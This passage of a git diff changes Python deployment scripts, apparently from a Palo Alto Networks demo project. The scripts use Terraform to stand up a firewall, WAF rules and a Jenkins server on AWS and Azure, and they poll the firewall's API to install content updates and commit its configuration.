web_in_deploy_output['NLB-DNS']['value'] + fwMgtIP = web_in_deploy_output['MGT-IP-FW-1']['value'] + + logger.info("Got these values from output of WebInDeploy \n\n") + logger.info("AppGateway address is {}".format(albDns)) + logger.info("Internal loadbalancer address is {}".format(nlbDns)) + logger.info("Firewall Mgt address is {}".format(fwMgt)) + + else: + logger.info("WebInDeploy failed") + update_status('web_in_deploy_status', 'error') + print(json.dumps(status_output)) + exit(1) + + # + # Check firewall is up and running + # + # + + api_key = getApiKey(fwMgtIP, username, password) + + while True: + err = getFirewallStatus(fwMgtIP, api_key) + if err == 'cmd_error': + logger.info("Command error from fw ") + + elif err == 'no': + logger.info("FW is not up...yet") + # print("FW is not up...yet") + time.sleep(60) + continue + + elif err == 'almost': + logger.info("MGT up waiting for dataplane") + time.sleep(20) + continue + + elif err == 'yes': + logger.info("FW is up") + break + + logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions') + time.sleep(10) + fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password) + + + logger.info("Updating firewall with latest content pack") + update_fw(fwMgtIP, api_key) + + # + # Configure Firewall + # + WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP}) + + logger.info("Applying addtional config to firewall") + + return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf') + + if return_code == 0: + update_status('web_in_fw_conf', 'success') + logger.info("WebInFWConf failed") + + else: + logger.info("WebInFWConf failed") + update_status('web_in_deploy_status', 'error') + print(json.dumps(status_output)) + exit(1) + + logger.info("Commit changes to firewall") + + fw.commit() + logger.info("waiting for commit") + time.sleep(60) + logger.info("waiting for commit") + + # + # Check Jenkins + # + + logger.info('Checking if Jenkins Server is ready') + + res = getServerStatus(albDns) + + if res == 'server_up': + logger.info('Jenkins Server is ready') + logger.info('\n\n ### Deployment Complete ###') + logger.info('\n\n Connect to Jenkins Server at http://{}'.format(albDns)) + else: + logger.info('Jenkins Server is down') + logger.info('\n\n ### Deployment Complete ###') + + # dump out status to stdout + print(json.dumps(status_output)) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + parser.add_argument('-r', '--resource_group', help='Resource Group', required=True) + parser.add_argument('-j', '--azure_region', help='Azure Region', required=True) + + args = parser.parse_args() + username = args.username + password = args.password + resource_group = args.resource_group + azure_region = args.azure_region + + main(username, password, resource_group, azure_region) diff --git a/aws/Jenkins_proj-master/deploy.py b/aws/Jenkins_proj-master/deploy.py index ed65e372..9d50e583 100644 --- a/aws/Jenkins_proj-master/deploy.py +++ b/aws/Jenkins_proj-master/deploy.py @@ -1,19 +1,25 @@ #!/usr/bin/env python3 """ -Paloaltonetworks deploy.py +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this 
permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. -This software is provided without support, warranty, or guarantee. -Use at your own risk. +# Author: Justin Harris jharris@paloaltonetworks.com Usage python deploy.py -u -p' -k -s -r - -Contents of json dict - -{"WebInDeploy": "Success", "WebInFWConf": "Success", "waf_conf": "Success"} -`""" - +""" import argparse import json import logging @@ -25,16 +31,17 @@ import requests import urllib3 +import xmltodict urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) from pandevice import firewall -from pandevice import updater +from collections import OrderedDict from python_terraform import Terraform gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2) -logging.basicConfig(level=logging.DEBUG) +logging.basicConfig(level=logging.INFO) logger = logging.getLogger() handler = logging.StreamHandler() formatter = logging.Formatter('%(levelname)-8s %(message)s') @@ -47,8 +54,16 @@ def send_request(call): + """ + Handles sending requests to API + :param call: url + :return: Retruns result of call. Will return response for codes between 200 and 400. + If 200 response code is required check value in response + """ + headers = {'Accept-Encoding': 'None', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + try: - r = requests.get(call, verify=False, timeout=5) + r = requests.get(call, headers=headers, verify=False, timeout=5) r.raise_for_status() except requests.exceptions.HTTPError as errh: ''' @@ -73,148 +88,225 @@ class DeployRequestException(Exception): pass -def update_fw(fwMgtIP, api_key): - # # Download latest applications and threats + +def walkdict(dict, match): + """ + Finds a key in a dict or nested dict and returns the value associated with it + :param d: dict or nested dict + :param key: key value + :return: value associated with key + """ + for key, v in dict.items(): + if key == match: + jobid = v + return jobid + elif isinstance(v, OrderedDict): + found = walkdict(v, match) + if found is not None: + return found + + + +def check_pending_jobs(fwMgtIP, api_key): type = "op" - cmd = "" + cmd = "" call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + key = 'result' + jobs = '' try: r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobs = walkdict(dict, key) + else: + logger.info('Didnt get a dict') + if not jobs: + # No jobs pending + return False + else: + # Jobs pending + return True + except: - DeployRequestException - logger.debug("failed to get jobid this time. 
Try again") - else: - tree = ET.fromstring(r.text) - jobid = tree[0][1].text - print("Download latest Applications and Threats update - " + str(jobid)) + logger.info('Didnt get response to check pending jobs') + return False + + +def update_fw(fwMgtIP, api_key): + """ + Applies latest AppID, Threat and AV updates to firewall after launch + :param fwMgtIP: Firewall management IP + :param api_key: API key + + """ + # # Download latest applications and threats + + type = "op" + cmd = "" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + getjobid = 0 + jobid = '' + key = 'job' + + # FIXME - Remove Duplicate code for parsing jobid + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + # FIXME - Remove Duplicate code for showing job status + completed = 0 while (completed == 0): - time.sleep(10) + time.sleep(45) call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) try: r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) except: DeployRequestException logger.debug("failed to get jobid this time. Try again") else: tree = ET.fromstring(r.text) - - if (tree[0][0][5].text == 'FIN'): - logger.debug("APP+TP download Status - " + str(tree[0][0][5].text)) - completed = 1 + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP download Complete ") + completed = 1 + print("Download latest Applications and Threats update") + status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Checking job is complete') + completed = 1 else: - print("Download latest Applications and Threats update") - status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str( - tree[0][0][12].text) + "% complete" - print('{0}\r'.format(status)) + logger.info('Unable to determine job status') + completed = 1 - # Install latest applications and threats without committing - time.sleep(1) + # Install latest content update type = "op" cmd = "latestno" call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) - try: - r = send_request(call) - except: - DeployRequestException - logger.debug("Requested content install but got response{}".format(r)) - else: - print("request for content upgrade response was {}".format(r.text)) - tree = ET.fromstring(r.text) - if tree.attrib['status'] == 'success': - ''' - Check that we were able to schedule the install - Valid response would contain - - Invalid response would contain - - ''' - jobid = tree[0][1].text - print("Install latest Applications and Threats update - " + str(jobid)) - - completed = 0 - while (completed == 0): - time.sleep(10) - call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( - fwMgtIP, jobid, api_key) - r = send_request(call) - tree = ET.fromstring(r.text) + getjobid = 0 + jobid = '' + key = 'job' - if (tree[0][0][5].text == 'FIN'): - logger.debug("APP+TP install Status - " + str(tree[0][0][5].text) 
+ " " + str( - tree[0][0][12].text) + "% complete") - completed = 1 - else: - print("tree value {}".format(tree[0][0][5].text)) - status = "APP+TP install Status - " + str(tree[0][0][5].text) + " " + str( - tree[0][0][12].text) + "% complete" - print('{0}\r'.format(status)) + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") else: - logger.debug("Unable to schedule install") - - # download latest anti-virus update - type = "op" - cmd = "" - call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) - try: - r = send_request(call) - except: - DeployRequestException - logger.debug("Requested AV download but got response{}".format(DeployRequestException)) - else: - tree = ET.fromstring(r.text) - jobid = tree[0][1].text - logger.debug("Got Jobid {} for download latest Anti-Virus update".format(str(jobid))) + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 completed = 0 while (completed == 0): - time.sleep(10) + time.sleep(45) call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) - r = send_request(call) - - tree = ET.fromstring(r.text) - if (tree[0][0][5].text == 'FIN'): - logger.debug( - "AV download Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete") - completed = 1 + try: + r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException + logger.debug("failed to get jobid this time. 
Try again") else: - status = "AV download Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" - print('{0}\r'.format(status)) + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP Install Complete ") + completed = 1 + print("Install latest Applications and Threats update") + status = "APP+TP Install Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Checking job is complete') + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 - # install latest anti-virus update without committing + + # Download latest anti-virus update without committing + getjobid = 0 + jobid = '' type = "op" - cmd = "latestno" - call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) - r = send_request(call) - tree = ET.fromstring(r.text) - if tree.attrib['status'] == 'success': - ''' - Check that we were able to schedule the install - Valid response would contain - - Invalid response would contain - - ''' - jobid = tree[0][1].text - print("Install latest Anti-Virus update - " + str(jobid)) - - completed = 0 - while (completed == 0): - time.sleep(10) - call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( - fwMgtIP, jobid, api_key) + cmd = "" + key = 'job' + while getjobid == 0: + try: + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) r = send_request(call) - tree = ET.fromstring(r.text) + logger.info('Got response to request AV install {}'.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 - if (tree[0][0][5].text == 'FIN'): - logger.debug( - "AV install Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete") + completed = 0 + while (completed == 0): + time.sleep(45) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( + fwMgtIP, jobid, api_key) + r = send_request(call) + tree = ET.fromstring(r.text) + logger.debug('Got response for show job {}'.format(r.text)) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.info("AV install Status Complete ") + completed = 1 + else: + status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) completed = 1 - else: - status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" - print('{0}\r'.format(status)) - else: - logger.debug("Unable to schedule install") + else: + logger.info('Unable to determine job status') + completed = 1 def getApiKey(hostname, username, password): @@ -232,8 +324,8 @@ def getApiKey(hostname, username, password): except DeployRequestException as updateerr: - logger.info("No response from FW. Wait 20 secs before retry") - time.sleep(10) + logger.info("No response from FW. 
Wait 30 secs before retry") + time.sleep(30) continue else: @@ -243,50 +335,6 @@ def getApiKey(hostname, username, password): return api_key -# def getFirewallStatus(fwMgtIP, api_key): -# """ -# Gets the firewall status by sending the API request show chassis status. -# :param fwMgtIP: IP Address of firewall interface to be probed -# :param api_key: Panos API key -# """ -# global gcontext -# -# cmd = urllib.request.Request( -# "https://" + fwMgtIP + "/api/?type=op&cmd=&key=" + api_key) -# # Send command to fw and see if it times out or we get a response -# logger.info("Sending command 'show chassis status' to firewall") -# try: -# response = urllib.request.urlopen(cmd, data=None, context=gcontext, timeout=5).read() -# -# except urllib.error.URLError: -# logger.debug("No response from FW. So maybe not up!") -# return 'no' -# # sleep and check again? -# else: -# logger.debug("Got response to 'show chassis status' {}".format(response)) -# -# resp_header = ET.fromstring(response) -# logger.debug('Response header is {}'.format(resp_header)) -# -# if resp_header.tag != 'response': -# logger.debug("Did not get a valid 'response' string...maybe a timeout") -# return 'cmd_error' -# -# if resp_header.attrib['status'] == 'error': -# logger.debug("Got an error for the command") -# return 'cmd_error' -# -# if resp_header.attrib['status'] == 'success': -# # The fw responded with a successful command execution. So is it ready? -# for element in resp_header: -# if element.text.rstrip() == 'yes': -# logger.info("FW Chassis is ready to accept configuration and connections") -# return 'yes' -# else: -# logger.info("FW Chassis not ready, still waiting for dataplane") -# time.sleep(10) -# return 'almost' - def getFirewallStatus(fwIP, api_key): fwip = fwIP @@ -398,7 +446,53 @@ def getServerStatus(IP): return 'server_down' -def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key_pair, bootstrap_bucket): +def apply_tf(working_dir, vars, description): + """ + Handles terraform operations and returns variables in outputs.tf as a dict. 
+ :param working_dir: Directory that contains the tf files + :param vars: Additional variables passed in to override defaults equivalent to -var + :param description: Description of the deployment for logging purposes + :return: return_code - 0 for success or other for failure + outputs - Dictionary of the terraform outputs defined in the outputs.tf file + + """ + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # Class Terraform uses subprocess and setting capture_output to True will capture output + capture_output = kwargs.pop('capture_output', False) + + if capture_output is True: + stderr = subprocess.PIPE + stdout = subprocess.PIPE + else: + # if capture output is False, then everything will essentially go to stdout and stderrf + stderr = sys.stderr + stdout = sys.stdout + + start_time = time.asctime() + print('Starting Deployment at {}\n'.format(start_time)) + + # Create Bootstrap + + tf = Terraform(working_dir=working_dir) + + tf.cmd('init') + if run_plan: + # print('Calling tf.plan') + tf.plan(capture_output=False) + + return_code, stdout, stderr = tf.apply(vars=vars, capture_output=capture_output, + skip_plan=True, **kwargs) + outputs = tf.output() + + logger.debug('Got Return code {} for deployment of {}'.format(return_code, description)) + + return (return_code, outputs) + + +def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key_pair): username = username password = password aws_access_key = aws_access_key @@ -407,20 +501,14 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key ec2_key_pair = ec2_key_pair albDns = '' nlbDns = '' - fwMgt = '' - - default_vars = { - 'aws_access_key': aws_access_key, - 'aws_secret_key': aws_secret_key, - 'aws_region': aws_region - } + fwMgtIP = '' WebInDeploy_vars = { 'aws_access_key': aws_access_key, 'aws_secret_key': aws_secret_key, 'aws_region': aws_region, 'ServerKeyName': ec2_key_pair, - 'bootstrap_s3bucket': bootstrap_bucket + # 'bootstrap_s3bucket': bootstrap_bucket } waf_conf_vars = { @@ -437,111 +525,74 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key 'aws_secret_key': aws_secret_key, 'aws_region': aws_region, 'ServerKeyName': ec2_key_pair, - 'mgt-ipaddress-fw1': fwMgt, + 'mgt-ipaddress-fw1': fwMgtIP, 'nlb-dns': nlbDns, 'username': username, 'password': password } - # Set run_plan to TRUE is you wish to run terraform plan before apply - run_plan = False - kwargs = {"auto-approve": True} - - # Class Terraform uses subprocess and setting capture_output to True will capture output - capture_output = kwargs.pop('capture_output', False) - - if capture_output is True: - stderr = subprocess.PIPE - stdout = subprocess.PIPE - else: - # if capture output is False, then everything will essentially go to stdout and stderrf - stderr = sys.stderr - stdout = sys.stdout - start_time = time.asctime() - print(f'Starting Deployment at {start_time}\n') + # # Set run_plan to TRUE is you wish to run terraform plan before apply - # Build Infrastructure - - tf = Terraform(working_dir='./WebInDeploy') - - tf.cmd('init') - if run_plan: - # print('Calling tf.plan') - tf.plan(capture_output=False, var=WebInDeploy_vars) + run_plan = False - return_code1, stdout, stderr = tf.apply(var=WebInDeploy_vars, capture_output=capture_output, skip_plan=True, - **kwargs) + kwargs = {"auto-approve": True} - web_in_deploy_output = tf.output() + # + return_code, web_in_deploy_output = apply_tf('./WebInDeploy', 
WebInDeploy_vars, 'WebInDeploy') - logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1)) + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code)) # update_status('web_in_deploy_stdout', stdout) update_status('web_in_deploy_output', web_in_deploy_output) - if return_code1 != 0: + if return_code == 0: + update_status('web_in_deploy_status', 'success') + albDns = web_in_deploy_output['ALB-DNS']['value'] + fwMgtIP = web_in_deploy_output['MGT-IP-FW-1']['value'] + nlbDns = web_in_deploy_output['NLB-DNS']['value'] + fwMgtIP = web_in_deploy_output['MGT-IP-FW-1']['value'] + logger.info("Got these values from output of WebInDeploy \n\n") + logger.info("AppGateway address is {}".format(albDns)) + logger.info("Internal loadbalancer address is {}".format(nlbDns)) + logger.info("Firewall Mgt address is {}".format(fwMgtIP)) + + else: logger.info("WebInDeploy failed") update_status('web_in_deploy_status', 'error') - update_status('web_in_deploy_stderr', stderr) print(json.dumps(status_output)) exit(1) - else: - update_status('web_in_deploy_status', 'success') - - albDns = tf.output('ALB-DNS') - fwMgt = tf.output('MGT-IP-FW-1') - nlbDns = tf.output('NLB-DNS') - fwMgtIP = fwMgt - WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt + WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgtIP WebInFWConf_vars['nlb-dns'] = nlbDns WebInDeploy_vars['alb_dns'] = albDns WebInDeploy_vars['nlb-dns'] = nlbDns - # # Apply WAF Rules # + return_code, waf_conf_out = apply_tf('./waf_conf', waf_conf_vars, 'Waf_conf') - tf = Terraform(working_dir='./waf_conf') - tf.cmd('init') - kwargs = {"auto-approve": True} - logger.info("Applying WAF config to App LB") - - if run_plan: - tf.plan(capture_output=capture_output, var=vars, **kwargs) - - return_code3, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True, - var=waf_conf_vars, **kwargs) - - waf_conf_out = tf.output() + logger.debug('Got Return code for deploy waf_conf {}'.format(return_code)) update_status('waf_conf_output', waf_conf_out) # update_status('waf_conf_stdout', stdout) - # update_status('waf_conf_stderr', stderr) - - logger.debug('Got Return code to deploy waf_conf {}'.format(return_code3)) - - if return_code3 != 0: + # update_status('waf_conf_stderr', stderr + logger.debug('Got Return code to deploy waf_conf {}'.format(return_code)) + if return_code == 0: + update_status('waf_conf_status', 'success') + else: logger.info("waf_conf failed") update_status('waf_conf_status', 'error') - update_status('waf_conf_stderr', stderr) print(json.dumps(status_output)) exit(1) - else: - update_status('waf_conf_status', 'success') - - logger.info("Got these values from output of first run\n\n") - logger.info("ALB address is {}".format(albDns)) - logger.info("nlb address is {}".format(nlbDns)) - logger.info("Firewall Mgt address is {}".format(fwMgt)) # # Check firewall is up and running # # - api_key = getApiKey(fwMgtIP, username, password) + #FIXME Add timeout after 3 minutes + while True: err = getFirewallStatus(fwMgtIP, api_key) if err == 'cmd_error': @@ -565,56 +616,30 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions') time.sleep(10) fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password) + logger.info("Updating firewall with latest content pack") update_fw(fwMgtIP, api_key) - updateHandle = updater.ContentUpdater(fw) - - # updateHandle.download(fw) - # logger.info("Waiting 3 
minutes for content update to download") - # time.sleep(210) - # updateHandle.install() # # Configure Firewall # - tf = Terraform(working_dir='./WebInFWConf') - tf.cmd('init') - kwargs = {"auto-approve": True} - - logger.info("Applying addtional config to firewall") + return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf') - WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt + if return_code == 0: + update_status('web_in_fw_conf', 'success') + logger.info("WebInFWConf success") - if run_plan: - tf.plan(capture_output=capture_output, var=WebInFWConf_vars) - - # update initial vars with generated fwMgt ip - - return_code2, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True, - var=WebInFWConf_vars, **kwargs) - - web_in_fw_conf_out = tf.output() - - update_status('web_in_fw_conf_output', web_in_fw_conf_out) - # update_status('web_in_fw_conf_stdout', stdout) - - logger.debug('Got Return code for deploy WebInFwConf {}'.format(return_code2)) - - if return_code2 != 0: - logger.error("WebFWConfy failed") - update_status('web_in_fw_conf_status', 'error') - update_status('web_in_fw_conf_stderr', stderr) + else: + logger.info("WebInFWConf failed") + update_status('web_in_deploy_status', 'error') print(json.dumps(status_output)) exit(1) - else: - update_status('web_in_fw_conf_status', 'success') logger.info("Commit changes to firewall") fw.commit() - logger.info("waiting for commit") time.sleep(60) logger.info("waiting for commit") @@ -624,8 +649,6 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key logger.info('Checking if Jenkins Server is ready') - # FIXME - add outputs for all 3 dirs - res = getServerStatus(albDns) if res == 'server_up': @@ -636,9 +659,6 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key logger.info('Jenkins Server is down') logger.info('\n\n ### Deployment Complete ###') - # dump out status to stdout - print(json.dumps(status_output)) - if __name__ == '__main__': parser = argparse.ArgumentParser(description='Get Terraform Params') @@ -648,7 +668,7 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key parser.add_argument('-s', '--aws_secret_key', help='AWS Secret', required=True) parser.add_argument('-r', '--aws_region', help='AWS Region', required=True) parser.add_argument('-c', '--aws_key_pair', help='AWS EC2 Key Pair', required=True) - parser.add_argument('-b', '--s3_bootstrap_bucket', help='AWS S3 Bootstrap bucket', required=True) + # parser.add_argument('-b', '--s3_bootstrap_bucket', help='AWS S3 Bootstrap bucket', required=True) args = parser.parse_args() username = args.username @@ -657,6 +677,6 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key aws_secret_key = args.aws_secret_key aws_region = args.aws_region ec2_key_pair = args.aws_key_pair - bootstrap_s3bucket = args.s3_bootstrap_bucket + # bootstrap_s3bucket = args.s3_bootstrap_bucket - main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key_pair, bootstrap_s3bucket) + main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key_pair) diff --git a/aws/Jenkins_proj-master/deployold.py b/aws/Jenkins_proj-master/deployold.py new file mode 100644 index 00000000..ed65e372 --- /dev/null +++ b/aws/Jenkins_proj-master/deployold.py @@ -0,0 +1,662 @@ +#!/usr/bin/env python3 +""" +Paloaltonetworks deploy.py + +This software is provided without support, warranty, or guarantee. +Use at your own risk. 
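Before declaring the deployment complete, deploy.py probes the Jenkins address returned by Terraform with getServerStatus(), which retries an HTTP GET a bounded number of times. A simplified sketch of that kind of health check is shown here; the URL and the retry delay are illustrative additions, not values from the script.

import time

import requests


def wait_for_http_ok(url, attempts=15, delay=30):
    # Return True as soon as the endpoint answers successfully,
    # False once the retry budget is exhausted.
    for _ in range(attempts):
        try:
            requests.get(url, timeout=5).raise_for_status()
            return True
        except requests.exceptions.RequestException:
            time.sleep(delay)
    return False

# Example: wait_for_http_ok('http://alb-dns-placeholder.example.com/')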
+ +Usage + +python deploy.py -u -p' -k -s -r + +Contents of json dict + +{"WebInDeploy": "Success", "WebInFWConf": "Success", "waf_conf": "Success"} +`""" + +import argparse +import json +import logging +import ssl +import subprocess +import sys +import time +import xml.etree.ElementTree as ET + +import requests +import urllib3 + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +from pandevice import firewall +from pandevice import updater +from python_terraform import Terraform + +gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2) + +logging.basicConfig(level=logging.DEBUG) +logger = logging.getLogger() +handler = logging.StreamHandler() +formatter = logging.Formatter('%(levelname)-8s %(message)s') +handler.setFormatter(formatter) +logger.addHandler(handler) +logger.setLevel(logging.INFO) + +# global var to keep status output +status_output = dict() + + +def send_request(call): + try: + r = requests.get(call, verify=False, timeout=5) + r.raise_for_status() + except requests.exceptions.HTTPError as errh: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + ''' + logger.debug("DeployRequestException Http Error:") + raise DeployRequestException("Http Error:") + except requests.exceptions.ConnectionError as errc: + logger.debug("DeployRequestException Connection Error:") + raise DeployRequestException("Connection Error") + except requests.exceptions.Timeout as errt: + logger.debug("DeployRequestException Timeout Error:") + raise DeployRequestException("Timeout Error") + except requests.exceptions.RequestException as err: + logger.debug("DeployRequestException RequestException Error:") + raise DeployRequestException("Request Error") + else: + return r + + +class DeployRequestException(Exception): + pass + + +def update_fw(fwMgtIP, api_key): + # # Download latest applications and threats + type = "op" + cmd = "" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + try: + r = send_request(call) + except: + DeployRequestException + logger.debug("failed to get jobid this time. Try again") + else: + tree = ET.fromstring(r.text) + jobid = tree[0][1].text + print("Download latest Applications and Threats update - " + str(jobid)) + completed = 0 + while (completed == 0): + time.sleep(10) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + try: + r = send_request(call) + except: + DeployRequestException + logger.debug("failed to get jobid this time. 
Try again") + else: + tree = ET.fromstring(r.text) + + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP download Status - " + str(tree[0][0][5].text)) + completed = 1 + else: + print("Download latest Applications and Threats update") + status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + + # Install latest applications and threats without committing + time.sleep(1) + type = "op" + cmd = "latestno" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + try: + r = send_request(call) + except: + DeployRequestException + logger.debug("Requested content install but got response{}".format(r)) + else: + print("request for content upgrade response was {}".format(r.text)) + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + ''' + Check that we were able to schedule the install + Valid response would contain + + Invalid response would contain + + ''' + jobid = tree[0][1].text + print("Install latest Applications and Threats update - " + str(jobid)) + + completed = 0 + while (completed == 0): + time.sleep(10) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( + fwMgtIP, jobid, api_key) + r = send_request(call) + tree = ET.fromstring(r.text) + + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP install Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete") + completed = 1 + else: + print("tree value {}".format(tree[0][0][5].text)) + status = "APP+TP install Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + else: + logger.debug("Unable to schedule install") + + # download latest anti-virus update + type = "op" + cmd = "" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + try: + r = send_request(call) + except: + DeployRequestException + logger.debug("Requested AV download but got response{}".format(DeployRequestException)) + else: + tree = ET.fromstring(r.text) + jobid = tree[0][1].text + logger.debug("Got Jobid {} for download latest Anti-Virus update".format(str(jobid))) + + completed = 0 + while (completed == 0): + time.sleep(10) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + r = send_request(call) + + tree = ET.fromstring(r.text) + if (tree[0][0][5].text == 'FIN'): + logger.debug( + "AV download Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete") + completed = 1 + else: + status = "AV download Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + + # install latest anti-virus update without committing + type = "op" + cmd = "latestno" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + r = send_request(call) + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + ''' + Check that we were able to schedule the install + Valid response would contain + + Invalid response would contain + + ''' + 